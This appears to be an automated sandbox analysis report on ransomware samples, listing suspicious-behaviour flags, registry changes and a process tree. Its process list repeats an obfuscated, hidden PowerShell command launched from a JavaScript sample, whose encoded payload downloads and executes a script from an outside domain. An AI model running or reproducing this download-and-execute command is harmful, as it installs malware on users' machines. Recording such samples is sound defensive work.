Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A

Opens file in notepad (likely ransom note)

ransomware

Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3444 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\wordpad.exe C:\Windows\splwow64.exe
PID 3888 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 2920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 4932 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3888 wrote to memory of 5064 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\wordpad.exe

"C:\Users\Admin\AppData\Local\Temp\wordpad.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff99a76ab58,0x7ff99a76ab68,0x7ff99a76ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1720 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2308 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3052 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3828 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4552 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4580 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4896 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x25c,0x260,0x264,0x238,0x268,0x7ff674a0ae48,0x7ff674a0ae58,0x7ff674a0ae68

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault65846a50hfc51h4d05h9d25h9864a4563275

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xc0,0x12c,0x7ff996c046f8,0x7ff996c04708,0x7ff996c04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,15164911270397511287,14043078291404356030,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,15164911270397511287,14043078291404356030,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,15164911270397511287,14043078291404356030,131072 --lang=de --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4268 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5024 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2504 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2860 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5184 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5372 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5504 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=3164 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5480 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=3068 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5296 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4000 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5724 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=2516 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5728 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=3084 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4392 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4520 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=5196 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5080 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=qrcode_generator.mojom.QRCodeGeneratorService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4400 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\" -spe -an -ai#7zMap26044:190:7zEvent3368

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=4244 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=4776 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4868 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3404 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\" -spe -an -ai#7zMap27821:190:7zEvent7189

C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe

